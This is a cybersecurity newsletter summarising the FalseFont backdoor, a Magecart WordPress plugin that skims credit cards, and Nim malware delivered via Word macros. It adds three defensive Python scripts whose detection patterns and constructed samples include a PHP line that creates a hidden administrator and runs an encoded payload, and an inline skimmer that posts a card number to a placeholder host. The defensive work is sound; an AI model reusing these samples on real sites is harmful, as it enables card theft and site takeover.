The WicKed Web Weekly
E-Commerce Under Siege: Rogue WordPress Plugin Exposes Credit Card Risks
Happy Friday, cyber-sleuths! As we wrap up another week of digital drama, let's dive into a world where the only things more creative than the cybercriminals are the names of their malware. First up, we've got 'FalseFont,' a sneaky backdoor that's giving the defense sector more jitters than a double espresso. This custom-made cyber-nuisance, brought to you by the ever-so-busy Peach Sandstorm, is like the Swiss Army knife of malware, juggling data theft, remote access, and a side of espionage.
Switching gears to the e-commerce lane, watch out for that rogue WordPress plugin! It's not just adding items to your shopping cart; it's swiping credit card details faster than you can say "free shipping." This digital pickpocket, part of a Magecart campaign, makes stealing credit card info look as easy as a Black Friday sale.
And for our grand finale, behold the Nim-based malware masquerading as innocent Word documents. These aren't your average .docx files; they're gateways to a world of cyber chaos, proving that even the most mundane office tools can be a wolf in sheep's clothing.

Microsoft Raises Alarm Over 'FalseFont' Backdoor in Defense Sector
Defense sector, beware! Microsoft has detected a new cybersecurity threat called 'FalseFont,' a backdoor deployed by an Iranian threat group, Peach Sandstorm (also known as APT33, Elfin, and Refined Kitten). This pernicious backdoor gives the operators remote access to infected systems, lets them launch files, and transmits data to command-and-control servers.
First seen in action in early November 2023, FalseFont is the latest weapon in Peach Sandstorm's arsenal, a group known for its password spray attacks targeting satellite, defense, and pharmaceutical industries globally since at least 2013.
Microsoft's revelation aligns with its September 2023 report, highlighting the group's persistent and evolving threat. This news comes amid the Israel National Cyber Directorate's (INCD) accusations against Iran and Hezbollah for attempted cyberattacks on Ziv Hospital and a separate phishing campaign using a fake security advisory as a decoy to spread wiper malware.
The scope of these attacks remains unclear, but one thing's certain: the cyber realm is a key battleground for modern defense and intelligence activities.

E-Commerce Under Siege: Rogue WordPress Plugin Exposes Credit Card Risks
Attention, e-commerce sites! A rogue WordPress plugin has emerged, posing a significant threat to online security. Discovered by Sucuri, this malicious plugin is part of a Magecart campaign, designed to infiltrate e-commerce websites by creating fake administrator accounts and injecting JavaScript code to steal credit card details.
Security expert Ben Martin warns that the plugin disguises itself as 'WordPress Cache Addons' to appear legitimate. Once installed, it copies itself into the 'must-use plugins' directory, where it is hidden from the admin panel's plugin list, and it blocks manual removal by unregistering callback functions.
This fraudulent plugin can also stealthily create and hide admin user accounts, allowing threat actors prolonged access to e-commerce sites. Their ultimate goal? Injecting malware into checkout pages to skim credit card information and funnel it to their domains.
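As an added, defender-side illustration (this is not code from the article or from Sucuri), the script below audits a WordPress site's must-use plugins directory, which the article identifies as the plugin's hiding place. It reports any PHP file that is not on an operator-maintained allowlist, and flags files containing indicators matching the behaviour described: creating users with the administrator role (`wp_insert_user`/`wp_create_user`), unregistering callbacks (`remove_action`/`remove_filter`), and obfuscated payloads. The `pre_user_query` hook is included as my assumption about how admin accounts are commonly hidden from the user list; the article does not name the hooks the plugin uses, and the sample files are constructed here.

```python
"""Added example: read-only audit of wp-content/mu-plugins.
Indicator list and sample files are constructed for illustration;
the hooks named are assumptions, not details from the article."""
import os
import re
import tempfile

# Hypothetical indicator patterns; tune them for your own environment.
INDICATORS = {
    "creates_user": re.compile(r"\b(wp_insert_user|wp_create_user)\s*\(", re.I),
    "grants_admin": re.compile(r"['\"]administrator['\"]", re.I),
    "unregisters_hook": re.compile(r"\b(remove_action|remove_filter)\s*\(", re.I),
    "hides_users": re.compile(r"pre_user_query", re.I),  # assumed hiding technique
    "obfuscation": re.compile(r"\b(eval|base64_decode|gzinflate|str_rot13)\s*\(", re.I),
}


def scan_php_source(source: str) -> list[str]:
    """Return the names of all indicators present in one PHP source string."""
    return [name for name, rx in INDICATORS.items() if rx.search(source)]


def audit_mu_plugins(mu_dir: str, known_files: set[str]) -> dict[str, list[str]]:
    """Walk the mu-plugins directory and report each PHP file that is either
    absent from the allowlist or contains suspicious indicators.
    Returns {relative_path: [tag, ...]}; a file that is merely unexpected is
    reported with the single tag 'not_in_allowlist'."""
    findings: dict[str, list[str]] = {}
    for root, _dirs, files in os.walk(mu_dir):
        for fname in files:
            if not fname.lower().endswith(".php"):
                continue
            path = os.path.join(root, fname)
            rel = os.path.relpath(path, mu_dir)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = scan_php_source(fh.read())
            if rel not in known_files:
                hits.insert(0, "not_in_allowlist")
            if hits:
                findings[rel] = hits
    return findings


def demo() -> dict[str, list[str]]:
    """Build a constructed mu-plugins tree in a temp dir and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        mu = os.path.join(tmp, "mu-plugins")
        os.makedirs(mu)
        # Constructed benign file that is on the allowlist.
        with open(os.path.join(mu, "site-health.php"), "w", encoding="utf-8") as fh:
            fh.write("<?php\nadd_action('init', function () { /* legitimate */ });\n")
        # Constructed sample resembling the behaviour the article describes.
        with open(os.path.join(mu, "cache-addons.php"), "w", encoding="utf-8") as fh:
            fh.write(
                "<?php\n"
                "$u = wp_insert_user(array('user_login' => 'svc', 'role' => 'administrator'));\n"
                "add_action('pre_user_query', 'hide_row');\n"
                "remove_action('admin_notices', 'warn');\n"
                "eval(base64_decode($payload));\n"
            )
        return audit_mu_plugins(mu, known_files={"site-health.php"})


if __name__ == "__main__":
    for rel, tags in demo().items():
        print(f"{rel}: {', '.join(tags)}")
```

Because must-use plugins load unconditionally and never appear under Plugins in the dashboard, a file-level allowlist is the practical control here: anything the script reports that you did not deploy deserves a look, and the admin user list should be cross-checked against the database rather than trusted from the panel alone.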
This discovery follows a recent phishing campaign that tricked users into installing a malicious plugin, posing as a security patch, which also created admin users and deployed a web shell for remote access.
Sucuri has noticed a troubling trend: cybercriminals using 'RESERVED' CVE identifiers to mask their activities. Additionally, Europol's recent spotlight report on online fraud emphasizes the rising threat of digital skimming, shifting from front-end to more elusive back-end malware.
Group-IB's collaboration with Europol in operation Digital Skimming Action reveals the detection of 23 JS-sniffer families, contributing to a total of 132 known JS-sniffer families compromising global websites by the end of 2023.
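The JS-sniffer families above and the checkout-page injection described earlier share one observable: script on the payment page that was not put there by the site. The following added example (not code from the article, Sucuri or Group-IB) audits a rendered checkout page offline, flagging external scripts whose host is outside an operator allowlist and inline scripts that both reference card fields and contain a network send. The allowlist, the field-name patterns and the sample page are all constructed for this illustration.

```python
"""Added example: offline audit of a checkout page's scripts.
Allowlist, regexes and sample HTML are constructed for illustration."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed heuristics: names commonly given to card inputs, and the
# browser APIs an inline script would need to send data somewhere.
CARD_FIELD = re.compile(r"(card[_-]?number|cvv|cvc|ccnum|expir)", re.I)
SEND = re.compile(r"\b(fetch|XMLHttpRequest|sendBeacon|new\s+Image)\b")


class ScriptCollector(HTMLParser):
    """Collect external script sources and inline script bodies."""

    def __init__(self) -> None:
        super().__init__()
        self.external: list[str] = []
        self.inline: list[str] = []
        self._in_script = False
        self._buf: list[str] = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self.inline.append("".join(self._buf))
            self._in_script = False


def audit_checkout_html(html: str, allowed_hosts: set[str]) -> list[tuple[str, str]]:
    """Return (finding, detail) pairs for scripts that warrant review."""
    parser = ScriptCollector()
    parser.feed(html)
    findings: list[tuple[str, str]] = []
    for src in parser.external:
        host = urlparse(src).hostname  # None for relative URLs, which are same-origin
        if host and host.lower() not in allowed_hosts:
            findings.append(("external_script_not_allowlisted", host))
    for body in parser.inline:
        if CARD_FIELD.search(body) and SEND.search(body):
            findings.append(("inline_script_reads_card_and_sends", body.strip()[:60]))
    return findings


# Constructed sample page: one legitimate script, one unexpected third-party
# script, one inline handler that reads a card field and posts it, one benign inline.
SAMPLE_HTML = """<html><body>
<script src="https://shop.example/assets/checkout.js"></script>
<script src="//cdn.constructed-unknown.example/lib.js"></script>
<script>
  document.querySelector('#card_number').addEventListener('change', function (e) {
    fetch('https://collect.constructed-unknown.example/p', {method: 'POST', body: e.target.value});
  });
</script>
<script>console.log('checkout loaded');</script>
</body></html>"""

ALLOWED = {"shop.example"}

if __name__ == "__main__":
    for finding, detail in audit_checkout_html(SAMPLE_HTML, ALLOWED):
        print(finding, "->", detail)
```

This catches the front-end variant of skimming; the back-end variant the Europol report describes leaves no trace in the served HTML, which is why it also needs the server-side file audit and database checks rather than page scanning alone. A Content-Security-Policy with an explicit `script-src` and `connect-src` allowlist turns the same host list into a browser-enforced control.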
Moreover, a cryptocurrency drainer named MS Drainer, promoted through bogus Google Search and Twitter ads, has reportedly siphoned off $58.98 million from over 63,000 victims since March 2023, using more than 10,000 phishing sites.

Nim-Based Malware Disguised in Decoy Word Documents
A new phishing menace is on the rise, using decoy Microsoft Word documents to deliver a backdoor crafted in the Nim programming language. Security experts at Netskope, Ghanashyam Satpathy and Jan Michael Alcantara, highlight the challenges of tackling malware written in uncommon languages like Nim, citing the security community's unfamiliarity as a significant obstacle.
Nim's use in malware, such as NimzaLoader, Nimbda, IceXLoader, Dark Power, and Kanti, has been increasing. The phishing emails in this campaign appear to come from a Nepali government official, urging recipients to enable macros to activate the Nim malware. Once activated, the backdoor scans for analysis tools, self-terminating if detected, or otherwise establishing connections to a remote server for further instructions.
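Since the lure here depends on the recipient enabling macros, the cheapest control sits at the mail gateway. The added example below (not code from the article or from Netskope) inspects an Office attachment's OOXML package for a VBA project part, treats a macro part inside a file with a macro-free extension as a mismatch worth blocking, and routes legacy OLE2 `.doc` files to manual review because their macro streams need a different parser. The verdict policy and the in-memory sample documents are constructed for this illustration.

```python
"""Added example: attachment triage for Office documents carrying VBA.
Verdict policy and sample files are constructed for illustration."""
import io
import zipfile

MACRO_FREE_EXTENSIONS = {".docx", ".xlsx", ".pptx"}
VBA_PART_SUFFIX = "vbaproject.bin"   # OOXML stores VBA in e.g. word/vbaProject.bin
OLE2_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"  # legacy binary Office container


def inspect_office_attachment(filename: str, data: bytes) -> dict:
    """Return a triage record with has_vba, extension_mismatch and a verdict
    of 'allow', 'quarantine', 'block' or 'review' (constructed policy)."""
    ext = ("." + filename.rsplit(".", 1)[-1].lower()) if "." in filename else ""
    result = {"filename": filename, "is_ooxml": False, "has_vba": False,
              "extension_mismatch": False, "verdict": "allow"}
    if data.startswith(OLE2_MAGIC):
        # Legacy .doc/.xls: VBA lives in OLE streams, not a zip; hand off to an OLE parser.
        result["verdict"] = "review"
        return result
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            names = [n.lower() for n in zf.namelist()]
    except zipfile.BadZipFile:
        result["verdict"] = "review"  # not an OOXML package; unknown format
        return result
    result["is_ooxml"] = "[content_types].xml" in names
    result["has_vba"] = any(n.endswith(VBA_PART_SUFFIX) for n in names)
    if result["has_vba"]:
        # A VBA part behind a macro-free extension is an anomaly, not a user choice.
        result["extension_mismatch"] = ext in MACRO_FREE_EXTENSIONS
        result["verdict"] = "block" if result["extension_mismatch"] else "quarantine"
    return result


def build_sample_docx(with_vba: bool) -> bytes:
    """Construct a minimal OOXML package in memory for testing."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        if with_vba:
            zf.writestr("word/vbaProject.bin", b"\x00constructed")
    return buf.getvalue()


if __name__ == "__main__":
    for name, blob in [
        ("invoice.docx", build_sample_docx(False)),
        ("invoice.docm", build_sample_docx(True)),
        ("invoice.docx", build_sample_docx(True)),
        ("old.doc", OLE2_MAGIC + b"\x00" * 16),
    ]:
        print(name, inspect_office_attachment(name, blob)["verdict"])
```

The check is deliberately structural rather than content-based: it does not try to judge what the macro does, since the article's point is that malware in an unfamiliar language defeats familiarity-based analysis. Quarantining macro-enabled documents from external senders by default, and blocking them entirely when the extension disagrees with the package contents, removes the "enable content" decision from the recipient.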
This campaign follows a recent disclosure by Cyble of a Python-based stealer malware called Editbot Stealer, spread through social media messages. Moreover, phishing campaigns have been distributing DarkGate and NetSupport RAT malware via email and compromised websites, with Proofpoint identifying 20 campaigns using DarkGate between September and November 2023.
Proofpoint also uncovered an attack sequence using two traffic delivery systems to exploit a Windows SmartScreen security bypass vulnerability, CVE-2023-36025, before Microsoft's official patch release, indicating its use as a zero-day exploit.
The evolving nature of cyber threats, including the use of various TDS tools and multiple social engineering techniques, underscores the sophistication and diversity of modern cyber attacks.